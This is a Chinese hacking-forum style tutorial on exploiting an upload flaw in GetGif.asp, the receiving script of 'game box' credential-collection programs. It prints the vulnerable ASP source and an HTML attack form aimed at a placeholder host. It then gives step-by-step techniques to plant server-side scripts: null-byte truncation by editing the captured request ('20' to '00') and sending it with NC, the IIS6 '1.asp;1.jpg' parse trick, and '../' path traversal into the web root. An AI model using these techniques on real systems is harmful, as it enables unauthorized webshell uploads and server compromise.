漏洞操纵_最新的游戏箱子收信程序上传[网络技术]

文章写得简便一点,但是大家应当能看得懂!
存在这个漏洞的箱子程序还是挺多的!皇马,吉利什么的仿佛都有!
首先看一下存在漏洞的具体文件代码,文件名称是GetGif.asp
CODE:
<!--#include file="config.asp"-->
<%
Response.Buffer = True
Server.ScriptTimeOut=180
'On Error Resume Next
'dim SavePath
ExtName = "jpg,gif,png" '答应扩大名
SavePath =imgFolder '保存途径
If Right(SavePath,1)<>"/" Then SavePath=SavePath&"/" '在目录后加(/)
CheckAndCreateFolder(SavePath)
UpLoadAll_a = Request.TotalBytes '获得客户端全部内容
If(UpLoadAll_a<=0) Then
Response.Write "Sorry" 
Response.End
end if
Set UploadStream_c = Server.CreateObject("ADODB.Stream")
UploadStream_c.Type = 1
UploadStream_c.Open
UploadStream_c.Write Request.BinaryRead(UpLoadAll_a)
UploadStream_c.Position = 0
FormDataAll_d = UploadStream_c.Read
CrLf_e = chrB(13)&chrB(10)
FormStart_f = InStrB(FormDataAll_d,CrLf_e)
FormEnd_g = InStrB(FormStart_f+1,FormDataAll_d,CrLf_e)
Set FormStream_h = Server.Createobject("ADODB.Stream")
FormStream_h.Type = 1
FormStream_h.Open
UploadStream_c.Position = FormStart_f + 1
UploadStream_c.CopyTo FormStream_h,FormEnd_g-FormStart_f-3
FormStream_h.Position = 0
FormStream_h.Type = 2
FormStream_h.CharSet = "GB2312"
FormStreamText_i = FormStream_h.Readtext
FormStream_h.Close
FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,"\")+1,FormEnd_g)
'FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,"=")+2,FormEnd_g)
'Response.Write FileName_j
If(CheckFileExt(FileName_j,ExtName)) Then
SaveFile = Server.MapPath(SavePath & FileName_j)
'SaveFile=SavePath & FileName_j
If Err Then
Response.Write "Sorry" 
Err.Clear
Response.End
Else
SaveFile = CheckFileExists(SaveFile)
k=Instrb(FormDataAll_d,CrLf_e&CrLf_e)+4
l=Instrb(k+1,FormDataAll_d,leftB(FormDataAll_d,FormStart_f-1))-k-2
FormStream_h.Type=1
FormStream_h.Open
UploadStream_c.Position=k-1
UploadStream_c.CopyTo FormStream_h,l
FormStream_h.SaveToFile SaveFile,2
SaveFileName = Mid(SaveFile,InstrRev(SaveFile,"\")+1)
Response.write "OK"
Response.End
End If
Else
Response.Write "Sorry" 
Response.End
End If
%>
<%
'判断文件范例能否合格
Function CheckFileExt(FileName,ExtName) '文件名,答应上传文件范例
FileType = ExtName
FileType = Split(FileType,",")
For i = 0 To Ubound(FileType)
If LCase(Right(FileName,3)) = LCase(FileType(i)) then
CheckFileExt = True
Exit Function
Else
CheckFileExt = False
End if
Next
End Function
'查抄上传文件夹能否存在,不存在则成立文件夹
Function CheckAndCreateFolder(FolderName)
fldr = Server.Mappath(FolderName)
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(fldr) Then
fso.CreateFolder(fldr)
End If
Set fso = Nothing
End Function
'查抄文件能否存在,重命名存在文件
Function CheckFileExists(FileName)
Set fso=Server.CreateObject("Scripting.FileSystemObject")
If fso.FileExists(SaveFile) Then
i=1
msg=True
Do While msg
CheckFileExists = Replace(SaveFile,Right(SaveFile,4),"_" & i & Right(SaveFile,4))
If not fso.FileExists(CheckFileExists) Then
msg=False
End If
i=i+1
Loop
Else
CheckFileExists = FileName
End If
Set fso=Nothing
End Function
%>
也是很简便的一个上传代码,也存在上传漏洞,使我们想起了DVBBS的上传漏洞,自己着手写一个HTML提交页面
CODE:
<form action=http://www.xxx.com/getgif.asp method="post" enctype="multipart/form-data" name="form1">
<p>
<input name="file" type="file" size="50">
</p>
<p>
<input type="submit" name="Submit" value="提交">
</p>
</form>然后抓包,改包"20"-"00",NC上传便可以了~这步骤不懂得的朋友可以参考一下DVBBS的上传漏洞
以上办法通杀IIS5和IIS6,还有一种办法就是针对IIS6的解析漏洞,可以上传一个1.asp;1.jpg文件也是可以的!
此外还有一个就是针对途径的问题,因为默许的上传途径是/img/
但是很多箱子的主人都把这个途径改掉了,如改成/img001/,更有甚者将目录设置的更为复杂
针对这种情形的办理办法是在包中增添"../”,增添数目可以不是一个,假如箱子主人设置的很BT的话,可以通过提交多个"../”,
在发生提交叉误时,之前提交的文件就会被上传到网站的根目录了!具体情形还请大家具体解析一下!